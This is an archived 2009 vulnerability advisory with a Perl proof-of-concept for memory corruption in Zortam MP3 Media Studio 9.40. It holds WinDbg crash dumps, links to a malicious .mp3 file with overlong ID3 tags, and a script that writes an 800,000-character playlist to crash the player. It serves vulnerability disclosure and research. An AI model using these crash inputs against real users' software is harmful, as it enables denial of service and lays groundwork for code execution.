Zortam MP3 Media Studio 9.40 Memory Corruption

2009-07-17T00:00:00
ID PACKETSTORM:79317
Type packetstorm
Reporter LiquidWorm
Modified 2009-07-17T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
#  
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities  
#  
# Product web page: http://www.zortam.com  
#  
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from  
# two different malicious files. The first method is thru a .mp3 file which  
# has its ID3 tags filled with long strings. The second method is a .m3u list  
# which is loaded in to the player resulting in memory corruption of the whole  
# application including Dr.Watson crashing along with the app. For 1st method,  
# you can click the Search Media for MP3's button and select the folder where  
# the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load  
# .m3u file into the MP3 Player..boom boom!  
#  
# Tested on: Microsoft Windows XP Professional SP3 (English)  
#  
#  
# WinDbg:  
#  
# [*] overly long id3 tags (.mp3 file):  
# ---------------------------------------------------------------------------  
#  
# (edc.f34): Access violation - code c0000005 (first chance)  
# First chance exceptions are reported before any exception handling.  
# This exception may be expected and handled.  
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864  
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc  
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202  
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe -   
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:  
# 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]  
#  
# ---------------------------------------------------------------------------  
#  
#  
# [*] long playlist (.m3u file):  
# ---------------------------------------------------------------------------  
#  
# (84.b98): Access violation - code c0000005 (first chance)  
# First chance exceptions are reported before any exception handling.  
# This exception may be expected and handled.  
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54  
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc  
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206  
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:  
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????  
# 0:000> g  
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)  
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54  
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc  
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206  
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:  
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????  
#  
# ---------------------------------------------------------------------------  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
#  
# liquidworm gmail com  
#  
# Zero Science Lab - http://www.zeroscience.org  
#  
# 16.07.2009  
#  
#  
  
  
  
# For first method, use folowing PoC file: #  
# #  
################################################################  
# #  
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #  
# #  
# - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) #  
# #  
# - 3. http://securityreason.com/download/11/13 (mirror) #  
# #  
################################################################  
# #  
# #  
  
  
# For second method, use folowing PoC code:  
#  
  
$fle = "Kung_PoW.m3u";  
$mna = "A" x 800000;  
print "\n\n[+] Creating playlist file: $fle ...\r\n";  
sleep 1;  
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";  
print m3u "$mna";  
close (m3u);  
print "\n[+] Playlist file successfully created!\r\n";  
`